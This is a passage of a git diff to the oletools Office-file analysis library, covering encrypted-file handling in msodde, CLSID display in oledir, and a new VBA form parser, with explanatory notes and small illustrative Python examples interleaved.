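The dispatch above keys off container signatures: the OLE compound-file magic, the zip magic shared by all OOXML files, and `RTF_START`. A minimal sniffing helper along those lines (illustrative only; the real code uses `olefile.isOleFile` and `ooxml.get_type`):

```python
OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'  # compound file (doc/xls/ppt)
ZIP_MAGIC = b'PK\x03\x04'                        # OOXML (docx/xlsx/...) are zips
RTF_MAGIC = b'{\\rt'                             # same bytes as RTF_START

def sniff_container(header):
    """Classify a file by its first bytes; 'other' may still be csv or xml."""
    if header.startswith(OLE_MAGIC):
        return 'ole'
    if header.startswith(ZIP_MAGIC):
        return 'zip'
    if header.startswith(RTF_MAGIC):
        return 'rtf'
    return 'other'

print(sniff_container(b'{\\rtf1\\ansi ...'))  # rtf
```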
+
+# === MAIN =================================================================
+
+
+def process_maybe_encrypted(filepath, passwords=None, crypto_nesting=0,
+ **kwargs):
+ """
+ Process a file that might be encrypted.
+
+ Calls :py:func:`process_file` and if that fails tries to decrypt and
+ process the result. Based on recommendation in module doc string of
+ :py:mod:`oletools.crypto`.
+
+ :param str filepath: path to file on disc.
+ :param passwords: list of passwords (str) to try for decryption or None
+ :param int crypto_nesting: How many decryption layers were already used to
+ get the given file.
+ :param kwargs: same as :py:func:`process_file`
+ :returns: same as :py:func:`process_file`
+ """
+ # TODO: here filepath may also be a file in memory, it's not necessarily on disk
+ result = u''
+ try:
+ result = process_file(filepath, **kwargs)
+ if not crypto.is_encrypted(filepath):
+ return result
+ except Exception:
+ logger.debug('Ignoring exception:', exc_info=True)
+ if not crypto.is_encrypted(filepath):
+ raise
+
+ # we reach this point only if file is encrypted
+ # check if this is an encrypted file in an encrypted file in an ...
+ if crypto_nesting >= crypto.MAX_NESTING_DEPTH:
+ raise crypto.MaxCryptoNestingReached(crypto_nesting, filepath)
+
+ decrypted_file = None
+ if passwords is None:
+ passwords = crypto.DEFAULT_PASSWORDS
+ else:
+ passwords = list(passwords) + crypto.DEFAULT_PASSWORDS
+ try:
+ logger.debug('Trying to decrypt file')
+ decrypted_file = crypto.decrypt(filepath, passwords)
+ if not decrypted_file:
+ logger.error('Decrypt failed, run with debug output to get details')
+ raise crypto.WrongEncryptionPassword(filepath)
+ logger.info('Analyze decrypted file')
+ result = process_maybe_encrypted(decrypted_file, passwords,
+ crypto_nesting+1, **kwargs)
+ finally: # clean up
+ try: # (maybe file was not yet created)
+ os.unlink(decrypted_file)
+ except Exception:
+ logger.debug('Ignoring exception closing decrypted file:',
+ exc_info=True)
+ return result
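The decrypt-and-recurse control flow above (process, decrypt on encrypted input, bail out after `MAX_NESTING_DEPTH` layers) can be modeled with toy stand-ins. Every name below is hypothetical; only the recursion pattern mirrors `process_maybe_encrypted`:

```python
MAX_NESTING_DEPTH = 3  # toy value; oletools.crypto defines its own limit

def is_encrypted(blob):
    return blob.startswith(b'ENC:')      # toy marker instead of real crypto

def decrypt(blob, passwords):
    return blob[4:]                      # peel one toy encryption layer

def analyze(blob, passwords, depth=0):
    if not is_encrypted(blob):
        return blob.decode('ascii')      # stands in for process_file()
    if depth >= MAX_NESTING_DEPTH:
        raise RuntimeError('too many encryption layers')
    return analyze(decrypt(blob, passwords), passwords, depth + 1)

print(analyze(b'ENC:ENC:dde links', []))  # dde links
```

The depth counter is what protects against an encrypted file wrapped in an encrypted file, ad infinitum.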
-#=== MAIN =================================================================
def main(cmd_line_args=None):
""" Main function, called if this file is called as a script
@@ -321,37 +974,33 @@ def main(cmd_line_args=None):
"""
args = process_args(cmd_line_args)
- if args.json:
- jout = []
- jout.append(BANNER_JSON)
- else:
- # print banner with version
- print(BANNER)
+ # Setup logging to the console:
+ # here we use stdout instead of stderr by default, so that the output
+ # can be redirected properly.
+ log_helper.enable_logging(args.json, args.loglevel, stream=sys.stdout)
- if not args.json:
- print('Opening file: %s' % args.filepath)
+ if args.nounquote:
+ global NO_QUOTES
+ NO_QUOTES = True
+
+ logger.print_str(BANNER)
+ logger.print_str('Opening file: %s' % args.filepath)
text = ''
return_code = 1
try:
- text = process_file(args.filepath)
+ text = process_maybe_encrypted(
+ args.filepath, args.password,
+ field_filter_mode=args.field_filter_mode)
return_code = 0
except Exception as exc:
- if args.json:
- jout.append(dict(type='error', error=type(exc).__name__,
- message=str(exc))) # strange: str(exc) is enclosed in ""
- else:
- raise
+ logger.exception(str(exc))
- if args.json:
- for line in text.splitlines():
- jout.append(dict(type='dde-link', link=line.strip()))
- json.dump(jout, sys.stdout, check_circular=False, indent=4)
- print() # add a newline after closing "]"
- return return_code # required if we catch an exception in json-mode
- else:
- print ('DDE Links:')
- print(text)
+ logger.print_str('DDE Links:')
+ for link in text.splitlines():
+ logger.print_str(link, type='dde-link')
+
+ log_helper.end_logging()
return return_code
diff --git a/oletools/olebrowse.py b/oletools/olebrowse.py
index ccfb0a92..74bba029 100644
--- a/oletools/olebrowse.py
+++ b/oletools/olebrowse.py
@@ -12,7 +12,7 @@
olebrowse is part of the python-oletools package:
http://www.decalage.info/python/oletools
-olebrowse is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+olebrowse is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -41,8 +41,9 @@
# 2012-09-17 v0.01 PL: - first version
# 2014-11-29 v0.02 PL: - use olefile instead of OleFileIO_PL
# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -68,8 +69,8 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.easygui import easygui
-from oletools.thirdparty import olefile
+import easygui
+import olefile
from oletools import ezhexviewer
ABOUT = '~ About olebrowse'
diff --git a/oletools/oledir.py b/oletools/oledir.py
index 80442e80..42cda7e7 100644
--- a/oletools/oledir.py
+++ b/oletools/oledir.py
@@ -14,7 +14,7 @@
#=== LICENSE ==================================================================
-# oledir is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# oledir is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -48,8 +48,12 @@
# 2016-08-09 PL: - fixed issue #77 (imports from thirdparty dir)
# 2017-03-08 v0.51 PL: - fixed absolute imports, added optparse
# - added support for zip files and wildcards
+# 2018-04-11 v0.53 PL: - added table displaying storage tree and CLSIDs
+# 2018-04-13 PL: - moved KNOWN_CLSIDS to common.clsid
+# 2018-08-28 v0.54 PL: - olefile is now a dependency
+# 2018-10-06 - colorclass is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -60,6 +64,13 @@
import sys, os, optparse
+import olefile
+import colorclass
+
+# On Windows, colorclass needs to be enabled:
+if os.name == 'nt':
+ colorclass.Windows.enable(auto_colors=True)
+
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
# In that case, relative imports are NOT usable.
@@ -72,23 +83,9 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-# we also need the thirdparty dir for colorclass
-# TODO: remove colorclass from thirdparty, make it a dependency
-_thirdparty_dir = os.path.normpath(os.path.join(_thismodule_dir, 'thirdparty'))
-# print('_thirdparty_dir = %r' % _thirdparty_dir)
-if not _thirdparty_dir in sys.path:
- sys.path.insert(0, _thirdparty_dir)
-
-import colorclass
-
-# On Windows, colorclass needs to be enabled:
-if os.name == 'nt':
- colorclass.Windows.enable(auto_colors=True)
-
-from oletools.thirdparty import olefile
from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob
-
+from oletools.common.clsid import KNOWN_CLSIDS
# === CONSTANTS ==============================================================
@@ -105,7 +102,7 @@
STORAGE_COLORS = {
olefile.STGTY_EMPTY: 'green',
- olefile.STGTY_STORAGE: 'blue',
+ olefile.STGTY_STORAGE: 'cyan',
olefile.STGTY_STREAM: 'yellow',
olefile.STGTY_LOCKBYTES: 'magenta',
olefile.STGTY_PROPERTY: 'magenta',
@@ -127,6 +124,13 @@ def sid_display(sid):
else:
return sid
+def clsid_display(clsid):
+ if clsid in KNOWN_CLSIDS:
+ clsid += '\n%s' % KNOWN_CLSIDS[clsid]
+ color = 'yellow'
+ if 'CVE' in clsid:
+ color = 'red'
+ return (clsid, color)
# === MAIN ===================================================================
@@ -227,9 +231,38 @@ def main():
# t.add_row((id, status, entry_type, name, left, right, child, hex(d.isectStart), d.size))
table.write_row((id, status, entry_type, name, left, right, child, '%X' % d.isectStart, d.size),
colors=(None, status_color, etype_color, None, None, None, None, None, None))
+
+ table = tablestream.TableStream(column_width=[4, 28, 6, 38],
+ header_row=('id', 'Name', 'Size', 'CLSID'),
+ style=tablestream.TableStyleSlim)
+ rootname = ole.get_rootentry_name()
+ entry_id = 0
+ clsid = ole.root.clsid
+ clsid_text, clsid_color = clsid_display(clsid)
+ table.write_row((entry_id, rootname, '-', clsid_text),
+ colors=(None, 'cyan', None, clsid_color))
+ for entry in sorted(ole.listdir(storages=True)):
+ name = entry[-1]
+ # handle non-printable chars using repr(), remove quotes:
+ name = repr(name)[1:-1]
+ name_color = None
+ if ole.get_type(entry) in (olefile.STGTY_STORAGE, olefile.STGTY_ROOT):
+ name_color = 'cyan'
+ indented_name = ' '*(len(entry)-1) + name
+ entry_id = ole._find(entry)
+ try:
+ size = ole.get_size(entry)
+ except Exception:
+ size = '-'
+ clsid = ole.getclsid(entry)
+ clsid_text, clsid_color = clsid_display(clsid)
+ table.write_row((entry_id, indented_name, size, clsid_text),
+ colors=(None, name_color, None, clsid_color))
+
+
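The listing above indents each entry by its depth in the storage tree. Since olefile's `listdir()` yields each entry as a list of path components, the depth is simply `len(entry) - 1`. A minimal sketch with toy paths (no real OLE file involved):

```python
# Toy entries mimicking olefile.OleFileIO.listdir(storages=True) output:
# each entry is a list of path components inside the OLE storage tree.
entries = [
    ['Macros'],
    ['Macros', 'VBA'],
    ['Macros', 'VBA', 'ThisDocument'],
    ['WordDocument'],
]

rows = []
for entry in sorted(entries):
    # repr() escapes non-printable characters; [1:-1] strips the quotes
    name = repr(entry[-1])[1:-1]
    # indent by tree depth (two spaces per level, as in the listing above)
    rows.append('  ' * (len(entry) - 1) + name)

for row in rows:
    print(row)
```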
ole.close()
# print t
if __name__ == '__main__':
- main()
\ No newline at end of file
+ main()
diff --git a/oletools/oleform.py b/oletools/oleform.py
new file mode 100644
index 00000000..d1fc6910
--- /dev/null
+++ b/oletools/oleform.py
@@ -0,0 +1,557 @@
+#!/usr/bin/env python
+"""
+oleform.py
+
+oleform is a python module to parse VBA forms in Microsoft Office files.
+
+Authors: see https://github.com/decalage2/oletools/commits/master/oletools/oleform.py
+License: BSD, see source code or documentation
+
+oleform is part of the python-oletools package:
+http://www.decalage.info/python/oletools
+"""
+
+# === LICENSE ==================================================================
+
+# oletools is copyright (c) 2012-2020 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+# REFERENCES:
+# - MS-OFORMS: https://msdn.microsoft.com/en-us/library/office/cc313125%28v=office.12%29.aspx?f=255&MSPPError=-2147217396
+
+# CHANGELOG:
+# 2018-02-19 v0.53 PL: - fixed issue #260, removed long integer literals
+
+import struct
+
+class OleFormParsingError(Exception):
+ pass
+
+class Mask(object):
+ def __init__(self, val):
+ self._val = [(val & (1 << i)) >> i for i in range(self._size)]

+
+ def __str__(self):
+ return ', '.join(self._names[i] for i in range(self._size) if self._val[i])
+
+ def __getattr__(self, name):
+ return self._val[self._names.index(name)]
+
+ def __len__(self):
+ return self._size
+
+ def __getitem__(self, key):
+ return self._val[self._names.index(key)]
+
+ def consume(self, stream, props):
+ for (name, size) in props:
+ if self[name]:
+ stream.read(size)
+
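The `Mask` base class above turns a little-endian bit field into named boolean attributes. A minimal re-implementation of the idea (not the oletools class itself), showing how bit `i` of the packed value becomes a named flag:

```python
# Minimal sketch of the Mask idea: bit i of `val` becomes a named attribute.
class TinyMask(object):
    _size = 3
    _names = ['fA', 'fB', 'fC']

    def __init__(self, val):
        # extract bit i as 0 or 1: (val & (1 << i)) >> i
        self._val = [(val & (1 << i)) >> i for i in range(self._size)]

    def __getattr__(self, name):
        # only called for attributes not set in __init__, i.e. flag names
        return self._val[self._names.index(name)]

    def __str__(self):
        return ', '.join(self._names[i]
                         for i in range(self._size) if self._val[i])

m = TinyMask(0b101)   # bits 0 and 2 set
print(str(m))         # fA, fC
```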
+class FormPropMask(Mask):
+ """FormPropMask: [MS-OFORMS] 2.2.10.2"""
+ _size = 28
+ _names = ['Unused1', 'fBackColor', 'fForeColor', 'fNextAvailableID', 'Unused2_0', 'Unused2_1',
+ 'fBooleanProperties', 'fBorderStyle', 'fMousePointer', 'fScrollBars',
+ 'fDisplayedSize', 'fLogicalSize', 'fScrollPosition', 'fGroupCnt', 'Reserved',
+ 'fMouseIcon', 'fCycle', 'fSpecialEffect', 'fBorderColor', 'fCaption', 'fFont',
+ 'fPicture', 'fZoom', 'fPictureAlignment', 'fPictureTiling', 'fPictureSizeMode',
+ 'fShapeCookie', 'fDrawBuffer']
+
+class SitePropMask(Mask):
+ """SitePropMask: [MS-OFORMS] 2.2.10.12.2"""
+ _size = 15
+ _names = ['fName', 'fTag', 'fID', 'fHelpContextID', 'fBitFlags', 'fObjectStreamSize',
+ 'fTabIndex', 'fClsidCacheIndex', 'fPosition', 'fGroupID', 'Unused1',
+ 'fControlTipText', 'fRuntimeLicKey', 'fControlSource', 'fRowSource']
+
+class MorphDataPropMask(Mask):
+ """MorphDataPropMask: [MS-OFORMS] 2.2.5.2"""
+ _size = 33
+ _names = ['fVariousPropertyBits', 'fBackColor', 'fForeColor', 'fMaxLength', 'fBorderStyle',
+ 'fScrollBars', 'fDisplayStyle', 'fMousePointer', 'fSize', 'fPasswordChar',
+ 'fListWidth', 'fBoundColumn', 'fTextColumn', 'fColumnCount', 'fListRows',
+ 'fcColumnInfo', 'fMatchEntry', 'fListStyle', 'fShowDropButtonWhen', 'UnusedBits1',
+ 'fDropButtonStyle', 'fMultiSelect', 'fValue', 'fCaption', 'fPicturePosition',
+ 'fBorderColor', 'fSpecialEffect', 'fMouseIcon', 'fPicture', 'fAccelerator',
+ 'UnusedBits2', 'Reserved', 'fGroupName']
+
+class ImagePropMask(Mask):
+ """ImagePropMask: [MS-OFORMS] 2.2.3.2"""
+ _size = 15
+ _names = ['UnusedBits1_1', 'UnusedBits1_2', 'fAutoSize', 'fBorderColor', 'fBackColor',
+ 'fBorderStyle', 'fMousePointer', 'fPictureSizeMode', 'fSpecialEffect', 'fSize',
+ 'fPicture', 'fPictureAlignment', 'fPictureTiling', 'fVariousPropertyBits',
+ 'fMouseIcon']
+
+class CommandButtonPropMask(Mask):
+ """CommandButtonPropMask: [MS-OFORMS] 2.2.1.2"""
+ _size = 11
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fCaption', 'fPicturePosition',
+ 'fSize', 'fMousePointer', 'fPicture', 'fAccelerator', 'fTakeFocusOnClick',
+ 'fMouseIcon']
+
+class SpinButtonPropMask(Mask):
+ """SpinButtonPropMask: [MS-OFORMS] 2.2.8.2"""
+ _size = 15
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fSize', 'UnusedBits1',
+ 'fMin', 'fMax', 'fPosition', 'fPrevEnabled', 'fNextEnabled', 'fSmallChange',
+ 'fOrientation', 'fDelay', 'fMouseIcon', 'fMousePointer']
+
+class TabStripPropMask(Mask):
+ """TabStripPropMask: [MS-OFORMS] 2.2.9.2"""
+ _size = 25
+ _names = ['fListIndex', 'fBackColor', 'fForeColor', 'Unused1', 'fSize', 'fItems',
+ 'fMousePointer', 'Unused2', 'fTabOrientation', 'fTabStyle', 'fMultiRow',
+ 'fTabFixedWidth', 'fTabFixedHeight', 'fTooltips', 'Unused3', 'fTipStrings',
+ 'Unused4', 'fNames', 'fVariousPropertyBits', 'fNewVersion', 'fTabsAllocated',
+ 'fTags', 'fTabData', 'fAccelerator', 'fMouseIcon']
+
+class LabelPropMask(Mask):
+ """LabelPropMask: [MS-OFORMS] 2.2.4.2"""
+ _size = 13
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fCaption',
+ 'fPicturePosition', 'fSize', 'fMousePointer', 'fBorderColor', 'fBorderStyle',
+ 'fSpecialEffect', 'fPicture', 'fAccelerator', 'fMouseIcon']
+
+class ScrollBarPropMask(Mask):
+ """ScrollBarPropMask: [MS-OFORMS] 2.2.7.2"""
+ _size = 17
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fSize', 'fMousePointer',
+ 'fMin', 'fMax', 'fPosition', 'UnusedBits1', 'fPrevEnabled', 'fNextEnabled',
+ 'fSmallChange', 'fLargeChange', 'fOrientation', 'fProportionalThumb',
+ 'fDelay', 'fMouseIcon']
+
+class ExtendedStream(object):
+ def __init__(self, stream, path):
+ self._pos = 0
+ self._jumps = []
+ self._stream = stream
+ self._path = path
+ self._padding = False
+ self._pad_start = 0
+
+ @classmethod
+ def open(cls, ole_file, path):
+ stream = ole_file.openstream(path)
+ return cls(stream, path)
+
+ def _read(self, size):
+ self._pos += size
+ return self._stream.read(size)
+
+ def _pad(self, start, size=4):
+ offset = (self._pos - start) % size
+ if offset:
+ self._read(size - offset)
+
+ def read(self, size):
+ if self._padding:
+ self._pad(self._pad_start, size)
+ return self._read(size)
+
+ def will_jump_to(self, size):
+ self._next_jump = ('jump', (self._pos, size))
+ return self
+
+ def will_pad(self):
+ self._next_jump = ('pad', self._pos)
+ return self
+
+ def padded_struct(self):
+ self._next_jump = ('padded', (self._padding, self._pad_start))
+ self._padding = True
+ self._pad_start = self._pos
+ return self
+
+ def __enter__(self):
+ assert(self._next_jump)
+ self._jumps.append(self._next_jump)
+ self._next_jump = None
+
+ def __exit__(self, exc_type, exc_value, traceback):
+ if exc_type is None:
+ (jump_type, data) = self._jumps.pop()
+ if jump_type == 'jump':
+ (start, size) = data
+ consummed = self._pos - start
+ if consummed > size:
+ self.raise_error('Bad jump: too much read ({0} > {1})'.format(consummed, size))
+ self.read(size - consummed)
+ elif jump_type == 'pad':
+ self._pad(data)
+ elif jump_type == 'padded':
+ (prev_padding, prev_pad_start) = data
+ self._pad(self._pad_start)
+ self._padding = prev_padding
+ self._pad_start = prev_pad_start
+
+ def unpacks(self, format, size):
+ return struct.unpack(format, self.read(size))
+
+ def unpack(self, format, size):
+ return self.unpacks(format, size)[0]
+
+ def raise_error(self, reason, back=0):
+ raise OleFormParsingError('{0}:{1}: {2}'.format(self._path, self._pos - back, reason))
+
+ def check_values(self, name, format, size, expected):
+ value = self.unpacks(format, size)
+ if value != expected:
+ self.raise_error('Invalid {0}: expected {1} got {2}'.format(name, str(expected), str(value)))
+
+ def check_value(self, name, format, size, expected):
+ self.check_values(name, format, size, (expected,))
+
+
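`ExtendedStream._pad()` above skips just enough bytes so that the current position, measured from the start of the padded structure, lands on the next `size`-byte boundary. The arithmetic in isolation:

```python
# Sketch of the alignment rule in ExtendedStream._pad(): skip enough
# bytes so that (pos - start) becomes a multiple of `size`.
def bytes_to_skip(start, pos, size=4):
    offset = (pos - start) % size
    return (size - offset) if offset else 0

print(bytes_to_skip(0, 6))   # 2 bytes to reach the next 4-byte boundary
print(bytes_to_skip(0, 8))   # already aligned: 0
```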
+def consume_TextProps(stream):
+ # TextProps: [MS-OFORMS] 2.3.1
+ stream.check_values('TextProps (versions)', '<BB', 2, (2, 0))
+ size = stream.unpack('<H', 2)
+ stream.read(size)
+
+def consume_GuidAndFont(stream):
+ # GuidAndFont: [MS-OFORMS] 2.4.7
+ UUIDS = stream.unpacks('<LHH', 8) + stream.unpacks('>Q', 8)
+ if UUIDS == (199447043, 36753, 4558, 11376937813817407569):
+ # UUID == {0BE35203-8F91-11CE-9DE300AA004BB851}
+ # StdFont: [MS-OFORMS] 2.4.12
+ stream.check_value('StdFont (version)', '<B', 1, 1)
+ else:
+ consume_TextProps(stream)
+
+def consume_GuidAndPicture(stream):
+ # GuidAndPicture: [MS-OFORMS] 2.4.8
+ stream.check_values('GuidAndPicture (UUID part 1)', '<LHH', 8, (199447044, 36753, 4558))
+ stream.check_value('GuidAndPicture (UUID part 2)', '>Q', 8, 11376937813817407569)
+ # StdPicture: [MS-OFORMS] 2.4.13
+ stream.check_value('StdPicture (Preamble)', '<L', 4, 0x0000746C)
+ size = stream.unpack('<L', 4)
+ stream.read(size)
+
+def consume_CountOfBytesWithCompressionFlag(stream):
+ # CountOfBytesWithCompressionFlag: [MS-OFORMS] 2.4.14.2
+ count = stream.unpack('<L', 4)
+ return count & 0x7FFFFFFF
+
+def consume_OleSiteConcreteControl(stream):
+ # OleSiteConcreteControl: [MS-OFORMS] 2.2.10.12.1
+ propmask = SitePropMask(stream.unpack('<L', 4))
+ # SiteDataBlock: [MS-OFORMS] 2.2.10.12.3
+ name_len = tag_len = id = tabindex = ClsidCacheIndex = control_tip_text_len = 0
+ if propmask.fName:
+ name_len = consume_CountOfBytesWithCompressionFlag(stream)
+ if propmask.fTag:
+ tag_len = consume_CountOfBytesWithCompressionFlag(stream)
+ if propmask.fID:
+ id = stream.unpack('<L', 4)
+ if propmask.fTabIndex:
+ tabindex = stream.unpack('<H', 2)
+ if propmask.fClsidCacheIndex:
+ ClsidCacheIndex = stream.unpack('<H', 2)
+ if propmask.fControlTipText:
+ control_tip_text_len = consume_CountOfBytesWithCompressionFlag(stream)
+ name = None
+ if (name_len > 0):
+ name = stream.read(name_len)
+ # Consume 2 null bytes between name and tag.
+ #if ((tag_len > 0) or (control_tip_text_len > 0)):
+ # stream.read(2)
+ # # Sometimes it looks like 2 extra null bytes go here whether or not there is a tag.
+ tag = None
+ if (tag_len > 0):
+ tag = stream.read(tag_len)
+ # Skip SitePosition.
+ if propmask.fPosition:
+ stream.read(8)
+ control_tip_text = stream.read(control_tip_text_len)
+ if (len(control_tip_text) == 0):
+ control_tip_text = None
+ return {'name': name, 'tag': tag, 'id': id, 'tabindex': tabindex,
+ 'ClsidCacheIndex': ClsidCacheIndex, 'value': None, 'caption': None,
+ 'control_tip_text':control_tip_text}
+
+def consume_FormControl(stream):
+ # FormControl: [MS-OFORMS] 2.2.10.1
+ stream.check_values('FormControl (versions)', '<BB', 2, (0, 4))
+ propmask = FormPropMask(stream.unpack('<L', 4))
+ if propmask.fBooleanProperties:
+ BooleanProperties = stream.unpack('<L', 4)
+ FORM_FLAG_DONTSAVECLASSTABLE = (BooleanProperties & (1 << 15)) >> 15
+ else:
+ FORM_FLAG_DONTSAVECLASSTABLE = 0
+ # Skip the rest of DataBlock and ExtraDataBlock
+ # FormStreamData: [MS-OFORMS] 2.2.10.5
+ if propmask.fMouseIcon:
+ consume_GuidAndPicture(stream)
+ if propmask.fFont:
+ consume_GuidAndFont(stream)
+ if propmask.fPicture:
+ consume_GuidAndPicture(stream)
+ # FormSiteData: [MS-OFORMS] 2.2.10.6
+ if not FORM_FLAG_DONTSAVECLASSTABLE:
+ CountOfSiteClassInfo = stream.unpack('<H', 2)
+ for i in range(CountOfSiteClassInfo):
+ consume_SiteClassInfo(stream)
+ (CountOfSites, CountOfBytes) = stream.unpacks('<LL', 8)
+ remaining_SiteDepthsAndTypes = CountOfSites
+ while remaining_SiteDepthsAndTypes > 0:
+ remaining_SiteDepthsAndTypes -= consume_FormObjectDepthTypeCount(stream)
+ for i in range(CountOfSites):
+ yield consume_OleSiteConcreteControl(stream)
+
+def consume_MorphDataControl(stream):
+ # MorphDataControl: [MS-OFORMS] 2.2.5.1
+ stream.check_values('MorphDataControl (versions)', '<BB', 2, (0, 2))
+ propmask = MorphDataPropMask(stream.unpack('<Q', 8))
+ value_size = caption_size = group_name_size = 0
+ if propmask.fValue:
+ value_size = consume_CountOfBytesWithCompressionFlag(stream)
+ if propmask.fCaption:
+ caption_size = consume_CountOfBytesWithCompressionFlag(stream)
+ if propmask.fGroupName:
+ group_name_size = consume_CountOfBytesWithCompressionFlag(stream)
+ # Read value text.
+ value = ""
+ if (value_size > 0):
+ value = stream.read(value_size)
+ # Read caption text.
+ caption = ""
+ if (caption_size > 0):
+ caption = stream.read(caption_size)
+ # Read groupname text.
+ group_name = ""
+ if (group_name_size > 0):
+ group_name = stream.read(group_name_size)
+
+ # MorphDataStreamData: [MS-OFORMS] 2.2.5.5
+ if propmask.fMouseIcon:
+ consume_GuidAndPicture(stream)
+ if propmask.fPicture:
+ consume_GuidAndPicture(stream)
+ consume_TextProps(stream)
+ return (value, caption, group_name)
+
+def consume_ImageControl(stream):
+ # ImageControl: [MS-OFORMS] 2.2.3.1
+ stream.check_values('ImageControl (versions)', '<BB', 2, (0, 2))
+ propmask = ImagePropMask(stream.unpack('<L', 4))
diff --git a/oletools/oleid.py b/oletools/oleid.py
--- a/oletools/oleid.py
+++ b/oletools/oleid.py
+The results are displayed as an ASCII table (but could be returned or printed
+in other formats like CSV, XML or JSON in the future).
oleid project website: http://www.decalage.info/python/oleid
@@ -18,11 +17,11 @@
#=== LICENSE =================================================================
-# oleid is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+# oleid is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
@@ -30,16 +29,17 @@
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
# To improve Python 2+3 compatibility:
from __future__ import print_function
@@ -54,8 +54,12 @@
# 2016-10-25 v0.50 PL: - fixed print and bytes strings for Python 3
# 2016-12-12 v0.51 PL: - fixed relative imports for Python 3 (issue #115)
# 2017-04-26 PL: - fixed absolute imports (issue #141)
+# 2017-09-01 SA: - detect OpenXML encryption
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
